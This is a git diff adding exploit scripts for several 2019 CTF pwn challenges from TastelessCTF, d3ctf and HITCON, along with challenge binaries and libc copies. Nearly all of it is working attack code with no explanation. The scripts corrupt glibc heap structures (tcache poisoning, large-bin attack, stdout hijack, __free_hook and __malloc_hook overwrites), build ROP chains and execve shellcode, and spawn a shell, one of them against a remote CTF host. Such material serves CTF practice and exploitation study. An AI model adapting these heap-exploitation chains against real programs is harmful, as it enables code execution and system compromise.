diff --git a/TastelessCTF_2019/pwn/house_of_bad_taste/chall b/TastelessCTF_2019/pwn/house_of_bad_taste/chall new file mode 100755 index 0000000..93e5ce7 Binary files /dev/null and b/TastelessCTF_2019/pwn/house_of_bad_taste/chall differ diff --git a/TastelessCTF_2019/pwn/house_of_bad_taste/chall.i64 b/TastelessCTF_2019/pwn/house_of_bad_taste/chall.i64 new file mode 100644 index 0000000..cbcf660 Binary files /dev/null and b/TastelessCTF_2019/pwn/house_of_bad_taste/chall.i64 differ diff --git a/TastelessCTF_2019/pwn/house_of_bad_taste/exp.py b/TastelessCTF_2019/pwn/house_of_bad_taste/exp.py new file mode 100644 index 0000000..cb98c7a --- /dev/null +++ b/TastelessCTF_2019/pwn/house_of_bad_taste/exp.py @@ -0,0 +1,108 @@ +#!/usr/bin/python2 +# -*- coding:utf-8 -*- + +from pwn import * +import os +import struct +import random +import time +import sys +import signal + +salt = os.getenv('GDB_SALT') if (os.getenv('GDB_SALT')) else '' + +def clear(signum=None, stack=None): + print('Strip all debugging information') + os.system('rm -f /tmp/gdb_symbols{}* /tmp/gdb_pid{}* /tmp/gdb_script{}*'.replace('{}', salt)) + exit(0) + +# for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: +# signal.signal(sig, clear) + +# # Create a symbol file for GDB debugging +# try: +# gdb_symbols = ''' + +# ''' + +# f = open('/tmp/gdb_symbols{}.c'.replace('{}', salt), 'w') +# f.write(gdb_symbols) +# f.close() +# os.system('gcc -g -shared /tmp/gdb_symbols{}.c -o /tmp/gdb_symbols{}.so'.replace('{}', salt)) +# # os.system('gcc -g -m32 -shared /tmp/gdb_symbols{}.c -o /tmp/gdb_symbols{}.so'.replace('{}', salt)) +# except Exception as e: +# print(e) + +context.arch = 'amd64' +# context.arch = 'i386' +context.log_level = 'debug' +execve_file = './chall' +# sh = process(execve_file, env={'LD_PRELOAD': '/tmp/gdb_symbols{}.so'.replace('{}', salt)}) +# sh = process(execve_file) +sh = remote('hitme.tasteless.eu', 10601) +# sh = remote('localhost', 1000) +elf = ELF(execve_file) +libc = ELF('./libc-2.29.so') +# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') + +# Create temporary files for GDB debugging +try: + gdbscript = ''' + def pr + x/8gx $rebase(0x4060) + end + ''' + + f = open('/tmp/gdb_pid{}'.replace('{}', salt), 'w') + f.write(str(proc.pidof(sh)[0])) + f.close() + + f = open('/tmp/gdb_script{}'.replace('{}', salt), 'w') + f.write(gdbscript) + f.close() +except Exception as e: + pass + +def add(size, content): + sh.sendlineafter('> ', 'a') + sh.sendlineafter('size?', str(size)) + sh.sendlineafter('format? ', 'z') + sh.sendafter(' note:\n', content) + +def edit(index, size, content): + sh.sendlineafter('> ', 'e') + sh.sendlineafter('id?', str(index)) + sh.sendlineafter('size?', str(size)) + sh.sendafter(' note:\n', content) + +def delete(index): + sh.sendlineafter('> ', 'd') + sh.sendlineafter('id?', str(index)) + +def show(index): + sh.sendlineafter('> ', 's') + sh.sendlineafter('id?', str(index)) + +add(0x17, '\n') +add(0x98, '\n') +add(0x98, '\n') +delete(0) +edit(0, 0x37, '\xff' * 0x30) +delete(0) + + +delete(1) +add(0x98, '\n') +show(0) + +sh.recvn(9) +libc_addr = u64(sh.recvn(8)) - 0x1e4ca0 +log.success('libc_addr: ' + hex(libc_addr)) + +add(0x200, p64(0) * 2 + p64(libc_addr + libc.symbols['__free_hook'] - 8)) +add(0x30, '/bin/sh\0' + p64(libc_addr + libc.symbols['system'])) + +delete(3) + +sh.interactive() +clear() \ No newline at end of file diff --git a/TastelessCTF_2019/pwn/house_of_bad_taste/libc-2.29.so b/TastelessCTF_2019/pwn/house_of_bad_taste/libc-2.29.so new file mode 100755 index 0000000..abf6515 Binary files /dev/null and b/TastelessCTF_2019/pwn/house_of_bad_taste/libc-2.29.so differ diff --git a/d3ctf2019/pwn/new_heap/exp.py b/d3ctf2019/pwn/new_heap/exp.py new file mode 100644 index 0000000..46fdcc8 --- /dev/null +++ b/d3ctf2019/pwn/new_heap/exp.py @@ -0,0 +1,127 @@ +#!/usr/bin/python2 +# -*- coding:utf-8 -*- + +from pwn import * +import os +import struct +import random +import time +import sys +import signal + +def clear(signum=None, stack=None): + print('Strip all debugging information') + os.system('rm -f /tmp/gdb_symbols* /tmp/gdb_pid /tmp/gdb_script') + exit(0) + +for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: + signal.signal(sig, clear) + +# # Create a symbol file for GDB debugging +# try: +# gdb_symbols = ''' + +# ''' + +# f = open('/tmp/gdb_symbols.c', 'w') +# f.write(gdb_symbols) +# f.close() +# os.system('gcc -g -shared /tmp/gdb_symbols.c -o /tmp/gdb_symbols.so') +# # os.system('gcc -g -m32 -shared /tmp/gdb_symbols.c -o /tmp/gdb_symbols.so') +# except Exception as e: +# pass + +context.arch = 'amd64' +# context.arch = 'i386' +# context.log_level = 'debug' +execve_file = './new_heap' +# execve_file = './new_heap' +# sh = process(execve_file, env={'LD_PRELOAD': '/tmp/gdb_symbols.so'}) +# sh = process(execve_file) +sh = remote('localhost', 1000) +elf = ELF(execve_file) +# libc = ELF('./libc-2.29.so') +libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') + +# Create temporary files for GDB debugging +try: + gdbscript = ''' + def pr + x/18gx $rebase(0x202060) + end + b malloc + ''' + + f = open('/tmp/gdb_pid', 'w') + f.write(str(proc.pidof(sh)[0])) + f.close() + + f = open('/tmp/gdb_script', 'w') + f.write(gdbscript) + f.close() +except Exception as e: + pass + +def add(size, content): + sh.sendlineafter('3.exit\n', '1') + sh.sendlineafter('size:', str(size)) + sh.sendafter('content:', content) + +def delete(index): + sh.sendlineafter('3.exit\n', '2') + sh.sendlineafter('index:', str(index)) + +def local_exit(content): + sh.sendlineafter('3.exit\n', '3') + sh.sendafter('sure?\n', content) + +def clear_exit_buf(num): + for i in range(num): + local_exit('') + + +sh.recvuntil('s:') +high = (int(sh.recvline(), 16) - 2) * 0x100 +log.success('high: ' + hex(high)) + + +for i in range(9): + add(0x28, '\n') + +for i in range(9): + delete(i) + +add(0x28, '\n') + +local_exit('a' * 0x28 + p8(0x31) + '\0\0') +# pause() +delete(8) # hijack tcache +clear_exit_buf(0x28 + 2) + +local_exit('a' * 0x28 + p64(0x31) + p16(high + 0x10)) +add(0x28, '\n') +add(0x28, '\0' * 0x20 + '\xff' * 0x8) + +# hijack tcache +delete(11) +add(0x48, '\0' * 0x10) +add(0x18, p16(0xe760)) # Let tcache point at stdout + +# pause() +add(0x38, p64(0xfbad2887 | 0x1000) + p64(0) * 3 + p8(0xc8)) # hijack stdout +result = sh.recvn(8) +libc_addr = u64(result) - libc.symbols['_IO_2_1_stdin_'] +log.success('libc_addr: ' + hex(libc_addr)) + +# again +delete(8) +clear_exit_buf(0x28 + 8 + 2 - 1) +local_exit('a' * 0x28 + p64(0x31) + p64(libc_addr + libc.symbols['__free_hook'])) + +add(0x28, '/bin/sh\0') +add(0x28, p64(libc_addr + libc.symbols['system'])) # hijack __free_hook + +delete(15) + +sh.interactive() +clear() \ No newline at end of file diff --git a/d3ctf2019/pwn/new_heap/exp.sh b/d3ctf2019/pwn/new_heap/exp.sh new file mode 100644 index 0000000..2cadc2a --- /dev/null +++ b/d3ctf2019/pwn/new_heap/exp.sh @@ -0,0 +1,25 @@ +#!/bin/sh + +EXP_FILE=$1 +INTERPRETER="python2" +STDERR_FILE="/tmp/exp.sh.err" + +times=0 +trap " rm -f $STDERR_FILE ; exit " INT + +if [ ! $1 ] +then + echo "Usage: ./exp.sh ./your_file.py" + exit +fi + +ulimit -c 0 + +while ((!(test -e $STDERR_FILE) || (test -s $STDERR_FILE))) +do + times=$((times+1)) + printf "times %d\n\n" $times + $INTERPRETER $EXP_FILE 2>$STDERR_FILE +done + +rm -f $STDERR_FILE \ No newline at end of file diff --git a/d3ctf2019/pwn/new_heap/libc.so.6 b/d3ctf2019/pwn/new_heap/libc.so.6 new file mode 100755 index 0000000..f831b77 Binary files /dev/null and b/d3ctf2019/pwn/new_heap/libc.so.6 differ diff --git a/d3ctf2019/pwn/new_heap/new_heap b/d3ctf2019/pwn/new_heap/new_heap new file mode 100755 index 0000000..2a77d03 Binary files /dev/null and b/d3ctf2019/pwn/new_heap/new_heap differ diff --git a/hitcon_ctf_2019/pwn/LazyHouse/exp.py b/hitcon_ctf_2019/pwn/LazyHouse/exp.py new file mode 100644 index 0000000..e3197c0 --- /dev/null +++ b/hitcon_ctf_2019/pwn/LazyHouse/exp.py @@ -0,0 +1,183 @@ +#!/usr/bin/python2 +# -*- coding:utf-8 -*- + +from pwn import * +import os +import struct +import random +import time +import sys +import signal + +def clear(signum=None, stack=None): + print('Strip all debugging information') + os.system('rm -f /tmp/gdb_symbols* /tmp/gdb_pid /tmp/gdb_script') + exit(0) + +for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: + signal.signal(sig, clear) + +# # Create a symbol file for GDB debugging +# try: +# gdb_symbols = ''' + +# ''' + +# f = open('/tmp/gdb_symbols.c', 'w') +# f.write(gdb_symbols) +# f.close() +# os.system('gcc -g -shared /tmp/gdb_symbols.c -o /tmp/gdb_symbols.so') +# # os.system('gcc -g -m32 -shared /tmp/gdb_symbols.c -o /tmp/gdb_symbols.so') +# except Exception as e: +# pass + +context.arch = 'amd64' +# context.arch = 'i386' +# context.log_level = 'debug' +execve_file = './lazyhouse' +# sh = process(execve_file, env={'LD_PRELOAD': '/tmp/gdb_symbols.so'}) +sh = process(execve_file) +# sh = remote('', 0) +elf = ELF(execve_file) +libc = ELF('./libc-2.29.so') +# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') + +# Create temporary files for GDB debugging +try: + gdbscript = ''' + def pr + x/gx $rebase(0x5010) + x/24gx $rebase(0x5060) + end + + b calloc + ''' + + f = open('/tmp/gdb_pid', 'w') + f.write(str(proc.pidof(sh)[0])) + f.close() + + f = open('/tmp/gdb_script', 'w') + f.write(gdbscript) + f.close() +except Exception as e: + pass + +def add(index, size, content): + sh.sendlineafter('Your choice: ', '1') + sh.sendlineafter('Index:', str(index)) + sh.sendlineafter('Size:', str(size)) + if(content): + sh.sendafter('House:', content) + +def show(index): + sh.sendlineafter('Your choice: ', '2') + sh.sendlineafter('Index:', str(index)) + +def delete(index): + sh.sendlineafter('Your choice: ', '3') + sh.sendlineafter('Index:', str(index)) + +def edit(index, content): + sh.sendlineafter('Your choice: ', '4') + sh.sendlineafter('Index:', str(index)) + sh.sendafter('House:', content) + +def triger(content): + sh.sendlineafter('Your choice: ', '5') + sh.sendafter('House:', content) + +# Multiplication overflow +add(0, 0x12c9fb4d812c9fc, None) +delete(0) + +# chunk overlap +add(0, 0x88, '\n') +add(1, 0x248, '\n') +add(2, 0x248, '\n') +add(6, 0x248, '\n') +add(3, 0x88, '\n') +add(7, 0x88, '\n') +add(4, 0x448, '\n') + +for i in range(7): + add(5, 0x248, '\n') + delete(5) + +edit(0, 'a' * 0x80 + p64(0) + p64(0x781)) +delete(1) +add(1, 0x338, 'b' * 0x240 + p64(0) + p64(0x251)) +add(5, 0x600, '\n') +show(2) +sh.recvn(0xf0) +libc_addr = u64(sh.recvn(8)) - 1120 - (libc.symbols['__malloc_hook'] + 0x10) +log.success('libc_addr: ' + hex(libc_addr)) + +sh.recvn(8) + +heap_addr = u64(sh.recvn(8)) & 0xfffffffffffff000 +log.success('heap_addr: ' + hex(heap_addr)) + +# large bin attack +delete(2) +add(2, 0x248, 'c' * 0xe0 + p64(0) + p64(0x441) + p64(libc_addr + 0x1e50a0) + p64(libc_addr + 0x1e50a0) + p64(0) + p64(libc_addr + 0x1e7600 - 0x20)) +delete(4) +add(4, 0x88, '\n') + +# fastbin attack +delete(4) +delete(2) +edit(1, 'd' * 0x240 + p64(0) + p64(0x251) + p64(heap_addr)) + +# for ROP +layout = [ + 0, + libc_addr + 0x0000000000026542, #: pop rdi; ret; + heap_addr + 0x540 + 0x100, + libc_addr + 0x0000000000026f9e, #: pop rsi; ret; + 0, + libc_addr + 0x0000000000047cf8, #: pop rax; ret; + 2, + libc_addr + 0x00000000000cf6c5, #: syscall; ret; + + libc_addr + 0x0000000000026542, #: pop rdi; ret; + 3, + libc_addr + 0x0000000000026f9e, #: pop rsi; ret; + heap_addr, + libc_addr + 0x000000000012bda6, #: pop rdx; ret; + 0x100, + libc_addr + 0x0000000000047cf8, #: pop rax; ret; + 0, + libc_addr + 0x00000000000cf6c5, #: syscall; ret; + + libc_addr + 0x0000000000026542, #: pop rdi; ret; + 1, + libc_addr + 0x0000000000026f9e, #: pop rsi; ret; + heap_addr, + libc_addr + 0x000000000012bda6, #: pop rdx; ret; + 0x100, + libc_addr + 0x0000000000047cf8, #: pop rax; ret; + 1, + libc_addr + 0x00000000000cf6c5, #: syscall; ret; + + libc_addr + 0x0000000000026542, #: pop rdi; ret; + 0, + libc_addr + 0x0000000000047cf8, #: pop rax; ret; + 231, + libc_addr + 0x00000000000cf6c5, #: syscall; ret; +] +add(2, 0x248, flat(layout).ljust(0x100, '\0') + './flag') + +# hijack tcache +add(4, 0x248, '\0' * 0x40 + p64(0) * 0x20 + p64(libc_addr + libc.symbols['__malloc_hook'])) + +triger(p64(libc_addr + 0x0058373)) +delete(4) + +# triger ROP +sh.sendafter('Your choice: ', '1\0'.ljust(0x20, '0')) +sh.sendlineafter('Index:', str(4)) +sh.sendlineafter('Size:', str(heap_addr + 0x540)) + +sh.interactive() +clear() \ No newline at end of file diff --git a/hitcon_ctf_2019/pwn/LazyHouse/lazyhouse b/hitcon_ctf_2019/pwn/LazyHouse/lazyhouse new file mode 100755 index 0000000..bb12f4b Binary files /dev/null and b/hitcon_ctf_2019/pwn/LazyHouse/lazyhouse differ diff --git a/hitcon_ctf_2019/pwn/LazyHouse/lazyhouse-36a41ff0b1ffcb57ca0dbe8d475439228f5ef58f.tar.gz b/hitcon_ctf_2019/pwn/LazyHouse/lazyhouse-36a41ff0b1ffcb57ca0dbe8d475439228f5ef58f.tar.gz new file mode 100644 index 0000000..e9bca90 Binary files /dev/null and b/hitcon_ctf_2019/pwn/LazyHouse/lazyhouse-36a41ff0b1ffcb57ca0dbe8d475439228f5ef58f.tar.gz differ diff --git a/hitcon_ctf_2019/pwn/LazyHouse/lazyhouse.i64 b/hitcon_ctf_2019/pwn/LazyHouse/lazyhouse.i64 new file mode 100644 index 0000000..642387f Binary files /dev/null and b/hitcon_ctf_2019/pwn/LazyHouse/lazyhouse.i64 differ diff --git a/hitcon_ctf_2019/pwn/LazyHouse/libc-2.29.so b/hitcon_ctf_2019/pwn/LazyHouse/libc-2.29.so new file mode 100644 index 0000000..abf6515 Binary files /dev/null and b/hitcon_ctf_2019/pwn/LazyHouse/libc-2.29.so differ diff --git a/hitcon_ctf_2019/pwn/Poe_1_Luna/exp.py b/hitcon_ctf_2019/pwn/Poe_1_Luna/exp.py new file mode 100644 index 0000000..c66ac31 --- /dev/null +++ b/hitcon_ctf_2019/pwn/Poe_1_Luna/exp.py @@ -0,0 +1,150 @@ +#!/usr/bin/python2 +# -*- coding:utf-8 -*- + +from pwn import * +import os +import struct +import random +import time +import sys +import signal + +def clear(signum=None, stack=None): + print('Strip all debugging information') + os.system('rm -f /tmp/gdb_symbols* /tmp/gdb_pid /tmp/gdb_script') + exit(0) + +for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: + signal.signal(sig, clear) + +# # Create a symbol file for GDB debugging +# try: +# gdb_symbols = ''' + +# ''' + +# f = open('/tmp/gdb_symbols.c', 'w') +# f.write(gdb_symbols) +# f.close() +# os.system('gcc -g -shared /tmp/gdb_symbols.c -o /tmp/gdb_symbols.so') +# # os.system('gcc -g -m32 -shared /tmp/gdb_symbols.c -o /tmp/gdb_symbols.so') +# except Exception as e: +# pass + +context.arch = 'amd64' +# context.arch = 'i386' +# context.log_level = 'debug' +execve_file = './luna' +# sh = process(execve_file, env={'LD_PRELOAD': '/tmp/gdb_symbols.so'}) +sh = process(execve_file) +# sh = remote('', 0) +elf = ELF(execve_file) +# libc = ELF('./libc-2.27.so') +libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') + +# Create temporary files for GDB debugging +try: + gdbscript = ''' + def pr + x/4gx 0x6D9340 + echo array:\\n + x/16x *(void **)0x6D9340 + end + b *0x4011a2 + ''' + + f = open('/tmp/gdb_pid', 'w') + f.write(str(proc.pidof(sh)[0])) + f.close() + + f = open('/tmp/gdb_script', 'w') + f.write(gdbscript) + f.close() +except Exception as e: + pass + +def new_tab(): + sh.sendlineafter('>>> ', 'n') + +def insert_tab(text): + sh.sendlineafter('>>> ', 'i') + sh.sendline(str(0)) + sh.sendline(text) + +def cut(num): + sh.sendlineafter('>>> ', 'c') + sh.sendline(str(0) + ' ' + str(num)) + +def paste(): + sh.sendlineafter('>>> ', 'p') + sh.sendline(str(0)) + +def write(content): + for i in range(len(content)): + sh.sendlineafter('>>> ', 'r') + sh.sendline(str(i) + ' ' + str(i + 1)) + sh.sendline(content[i]) + +def select(index): + sh.sendlineafter('>>> ', 's') + sh.sendline(str(index)) + +def display(start, end): + sh.sendlineafter('>>> ', 'd') + sh.sendline(str(start) + ' ' + str(end)) + + +insert_tab('a' * 0x18) +cut(0x18) + +new_tab() +insert_tab('b' * 0xf8) +cut(0xf0) + +new_tab() +paste() + +write(p64(0x21) * 8 + p64(8) + p64(0) + p64(elf.symbols['environ'])) +select(1) +display(0, 8) + +environ_addr = u64(sh.recvn(8)) +log.success('environ_addr: ' + hex(environ_addr)) + +select(2) +write(p64(0x21) * 8 + p64(0x100) + p64(0) + p64(environ_addr - 0x130 - 8)) # main return + +select(1) + # main return +write(p64(0x6d9360) + p64(0x0000000000400bcb)) # leave; ret + +layout = [ + 0, + 0x00000000004006a6, #: pop rdi; ret; + 0x6d9000, + 0x0000000000411583, #: pop rsi; ret; + 0x2000, + 0x000000000044d836, #: pop rdx; ret; + 7, + elf.symbols['mprotect'], + 0x00000000004ae2a7, #: jmp rsp; +] + +shellcode = asm(''' +mov rax, 0x0068732f6e69622f +push rax + +mov rdi, rsp +xor rsi, rsi +mul rsi +mov al, 59 +syscall +''') + +new_tab() +insert_tab(flat(layout) + shellcode) + +sh.sendlineafter('>>> ', 'q') + +sh.interactive() +clear() \ No newline at end of file diff --git a/hitcon_ctf_2019/pwn/Poe_1_Luna/luna b/hitcon_ctf_2019/pwn/Poe_1_Luna/luna new file mode 100755 index 0000000..b772801 Binary files /dev/null and b/hitcon_ctf_2019/pwn/Poe_1_Luna/luna differ diff --git a/hitcon_ctf_2019/pwn/Poe_1_Luna/luna.bak b/hitcon_ctf_2019/pwn/Poe_1_Luna/luna.bak new file mode 100755 index 0000000..feb5daa Binary files /dev/null and b/hitcon_ctf_2019/pwn/Poe_1_Luna/luna.bak differ diff --git a/hitcon_ctf_2019/pwn/Trick_or_Treat/exp.py b/hitcon_ctf_2019/pwn/Trick_or_Treat/exp.py new file mode 100644 index 0000000..f5d7321 --- /dev/null +++ b/hitcon_ctf_2019/pwn/Trick_or_Treat/exp.py @@ -0,0 +1,79 @@ +#!/usr/bin/python2 +# -*- coding:utf-8 -*- + +from pwn import * +import os +import struct +import random +import time +import sys +import signal + +def clear(signum=None, stack=None): + print('Strip all debugging information') + os.system('rm -f /tmp/gdb_symbols* /tmp/gdb_pid /tmp/gdb_script') + exit(0) + +for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: + signal.signal(sig, clear) + +# # Create a symbol file for GDB debugging +# try: +# gdb_symbols = ''' + +# ''' + +# f = open('/tmp/gdb_symbols.c', 'w') +# f.write(gdb_symbols) +# f.close() +# os.system('gcc -g -shared /tmp/gdb_symbols.c -o /tmp/gdb_symbols.so') +# # os.system('gcc -g -m32 -shared /tmp/gdb_symbols.c -o /tmp/gdb_symbols.so') +# except Exception as e: +# pass + +context.arch = 'amd64' +# context.arch = 'i386' +# context.log_level = 'debug' +execve_file = './trick_or_treat' +# sh = process(execve_file, env={'LD_PRELOAD': '/tmp/gdb_symbols.so'}) +sh = process(execve_file) +# sh = remote('', 0) +elf = ELF(execve_file) +# libc = ELF('./libc-2.27.so') +libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') + +# Create temporary files for GDB debugging +try: + gdbscript = ''' + b free + ''' + + f = open('/tmp/gdb_pid', 'w') + f.write(str(proc.pidof(sh)[0])) + f.close() + + f = open('/tmp/gdb_script', 'w') + f.write(gdbscript) + f.close() +except Exception as e: + pass + +sh.sendlineafter('Size:', str(0x40000)) +sh.recvuntil('Magic:') +ptr_base = int(sh.recvuntil('\n'), 16) +# Maybe different environments has different offset value. +libc_addr = ptr_base - 0x10 - 0x5b7000 +log.success('libc_addr: ' + hex(libc_addr)) + +sh.recvuntil('Offset & Value:') +offset = (libc_addr + libc.symbols['__free_hook']) - ptr_base +offset = int(offset / 8) + 0x10 ** 16 +sh.sendline('%lx %lx' % (offset, libc_addr + libc.symbols['system'])) + +sh.recvuntil('Offset & Value:') +sh.sendline('0' * 0x400 + ' ed') +sh.sendline('!/bin/sh') + + +sh.interactive() +clear() \ No newline at end of file diff --git a/hitcon_ctf_2019/pwn/Trick_or_Treat/libc.so.6 b/hitcon_ctf_2019/pwn/Trick_or_Treat/libc.so.6 new file mode 100755 index 0000000..f5b26e3 Binary files /dev/null and b/hitcon_ctf_2019/pwn/Trick_or_Treat/libc.so.6 differ diff --git a/hitcon_ctf_2019/pwn/Trick_or_Treat/trick_or_treat b/hitcon_ctf_2019/pwn/Trick_or_Treat/trick_or_treat new file mode 100755 index 0000000..b03d5ab Binary files /dev/null and b/hitcon_ctf_2019/pwn/Trick_or_Treat/trick_or_treat differ diff --git a/hitcon_ctf_2019/pwn/crypto_in_the_shell/chall b/hitcon_ctf_2019/pwn/crypto_in_the_shell/chall new file mode 100755 index 0000000..0ecb01c Binary files /dev/null and b/hitcon_ctf_2019/pwn/crypto_in_the_shell/chall differ diff --git a/hitcon_ctf_2019/pwn/crypto_in_the_shell/chall.i64 b/hitcon_ctf_2019/pwn/crypto_in_the_shell/chall.i64 new file mode 100644 index 0000000..737566f Binary files /dev/null and b/hitcon_ctf_2019/pwn/crypto_in_the_shell/chall.i64 differ diff --git a/hitcon_ctf_2019/pwn/crypto_in_the_shell/cryptoshell-c92be680c297022ff268211c016a64e4523bb87a.tar.gz b/hitcon_ctf_2019/pwn/crypto_in_the_shell/cryptoshell-c92be680c297022ff268211c016a64e4523bb87a.tar.gz new file mode 100644 index 0000000..caf97fb Binary files /dev/null and b/hitcon_ctf_2019/pwn/crypto_in_the_shell/cryptoshell-c92be680c297022ff268211c016a64e4523bb87a.tar.gz differ diff --git a/hitcon_ctf_2019/pwn/crypto_in_the_shell/exp.py b/hitcon_ctf_2019/pwn/crypto_in_the_shell/exp.py new file mode 100644 index 0000000..4c71489 --- /dev/null +++ b/hitcon_ctf_2019/pwn/crypto_in_the_shell/exp.py @@ -0,0 +1,135 @@ +#!/usr/bin/python2 +# -*- coding:utf-8 -*- + +from pwn import * +import os +import struct +import random +import time +import sys +import signal +from Crypto.Cipher import AES + +def clear(signum=None, stack=None): + print('Strip all debugging information') + os.system('rm -f /tmp/gdb_symbols* /tmp/gdb_pid /tmp/gdb_script') + exit(0) + +for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: + signal.signal(sig, clear) + +# # Create a symbol file for GDB debugging +# try: +# gdb_symbols = ''' + +# ''' + +# f = open('/tmp/gdb_symbols.c', 'w') +# f.write(gdb_symbols) +# f.close() +# os.system('gcc -g -shared /tmp/gdb_symbols.c -o /tmp/gdb_symbols.so') +# # os.system('gcc -g -m32 -shared /tmp/gdb_symbols.c -o /tmp/gdb_symbols.so') +# except Exception as e: +# pass + +context.arch = 'amd64' +# context.arch = 'i386' +# context.log_level = 'debug' +execve_file = './chall' +# sh = process(execve_file, env={'LD_PRELOAD': '/tmp/gdb_symbols.so'}) +sh = process(execve_file) +# sh = remote('', 0) +elf = ELF(execve_file) +# libc = ELF('./libc-2.27.so') +libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') + +# Create temporary files for GDB debugging +try: + gdbscript = ''' + b *$rebase(0x127F) + ''' + + f = open('/tmp/gdb_pid', 'w') + f.write(str(proc.pidof(sh)[0])) + f.close() + + f = open('/tmp/gdb_script', 'w') + f.write(gdbscript) + f.close() +except Exception as e: + pass + +def decrypt(key, iv, data): + instance = AES.new(key, AES.MODE_CBC, iv) + return instance.decrypt(data) + +def run_service(offset, size): + sh.sendlineafter('offset:', str(offset)) + sh.sendlineafter('size:', str(size)) + return sh.recvn((size & 0xfffffff0) + 0x10) + +# modify key,iv and get them +result = run_service(0xffffffffffffffe0, 0x10) +key = result[:0x10] +iv = result[0x10:] + +# leak +cipher = run_service(0xffffffffffffffc0, 1) +result = decrypt(key, iv, cipher) +libc_addr = u64(result[:8]) - libc.symbols['_IO_2_1_stderr_'] +log.success('libc_addr: ' + hex(libc_addr)) + +cipher = run_service(0xfffffffffffffc60, 1) +result = decrypt(key, iv, cipher) +image_base_addr = u64(result[8:16]) - 0x202008 +log.success('image_base_addr: ' + hex(image_base_addr)) + +offset = (libc_addr + libc.symbols['environ']) - (image_base_addr + elf.symbols['buf']) +cipher = run_service(offset, 1) +result = decrypt(key, iv, cipher) +stack_addr = u64(result[:8]) +log.success('stack_addr: ' + hex(stack_addr)) + +# hijack local variable +i_addr = stack_addr - 0x120 +offset = (i_addr) - (image_base_addr + elf.symbols['buf']) +run_service(offset, 1) + +''' +0x4f2c5 execve("/bin/sh", rsp+0x40, environ) +constraints: + rcx == NULL + +0x4f322 execve("/bin/sh", rsp+0x40, environ) +constraints: + [rsp+0x40] == NULL + +0x10a38c execve("/bin/sh", rsp+0x70, environ) +constraints: + [rsp+0x70] == NULL +''' + +# arbitrary memory writing +one_gadget = p64(libc_addr + 0x4f322) +offset = (stack_addr - 0xf0) - (image_base_addr + elf.symbols['buf']) +for i in range(8): + while(True): + result = run_service(offset + i, 1) + if(one_gadget[i] == result[0]): + log.success('i : ' + str(i)) + break + +print('') +content = '\0' * 8 +offset = (libc_addr + libc.symbols['environ']) - (image_base_addr + elf.symbols['buf']) +for i in range(8): + while(True): + result = run_service(offset + i, 1) + if(content[i] == result[0]): + log.success('i : ' + str(i)) + break + +sh.sendlineafter('offset:', 'a') + +sh.interactive() +clear() \ No newline at end of file diff --git a/hitcon_ctf_2019/pwn/crypto_in_the_shell/key.txt b/hitcon_ctf_2019/pwn/crypto_in_the_shell/key.txt new file mode 100644 index 0000000..3b4969e --- /dev/null +++ b/hitcon_ctf_2019/pwn/crypto_in_the_shell/key.txt @@ -0,0 +1 @@ +2b910df7ebf7a78c7b1d209501fea7e15b145ede31051ea7360d2dfd6d2812df - diff --git a/hitcon_ctf_2019/pwn/crypto_in_the_shell/libc-2.27.so b/hitcon_ctf_2019/pwn/crypto_in_the_shell/libc-2.27.so new file mode 100755 index 0000000..f5b26e3 Binary files /dev/null and b/hitcon_ctf_2019/pwn/crypto_in_the_shell/libc-2.27.so differ